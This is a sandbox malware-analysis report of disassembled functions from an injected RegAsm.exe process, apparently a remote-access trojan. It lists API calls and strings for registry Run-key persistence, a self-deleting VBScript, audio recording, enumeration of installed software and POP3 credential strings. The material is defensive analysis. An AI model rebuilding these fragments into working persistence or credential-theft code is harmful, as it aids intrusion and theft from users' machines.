                                          Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                          Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                          Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.p,004752F0,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 1861856835-1447701601
                                          • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                          • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                          Function 0040D0D1 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 260registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.p,004752F0,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                          • ExitProcess.KERNEL32 ref: 0040D454
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`.p$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                          • API String ID: 3797177996-1667283432
                                          • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                          • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                          Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                                          • API String ID: 2649220323-436679193
                                          • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                          • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                          Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                          • API String ID: 738084811-2094122233
                                          • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                          • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                          Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Write$Create
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 1602526932-4212202414
                                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                          Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,`.p,00407709), ref: 004072BF
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                          • API String ID: 1646373207-255920310
                                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                          Function 0044F4AD Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable
                                          • String ID: X8p
                                          • API String ID: 1464849758-3665062877
                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                          Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                          • API String ID: 4218353326-3023110444
                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                          Function 0040CE34 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 203fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040CE42
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                          • CopyFileW.KERNEL32 ref: 0040CF0B
                                          • _wcslen.LIBCMT ref: 0040CF21
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                          • CopyFileW.KERNEL32 ref: 0040CFBF
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                          • _wcslen.LIBCMT ref: 0040D001
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                          • CloseHandle.KERNEL32 ref: 0040D068
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`.p$del$open
                                          • API String ID: 1579085052-2010783679
                                          • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                          • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                          Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                          • _wcslen.LIBCMT ref: 0041C1CC
                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                          • GetLastError.KERNEL32 ref: 0041C204
                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                          • GetLastError.KERNEL32 ref: 0041C261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                          • String ID: ?
                                          • API String ID: 3941738427-1684325040
                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                          Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: %m$~$Gon~$~F@7$~dra
                                          • API String ID: 4218353326-230879103
                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                          Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                          • API String ID: 1332880857-3714951968
                                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                          Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                          Download Yara Rule
                                          APIs
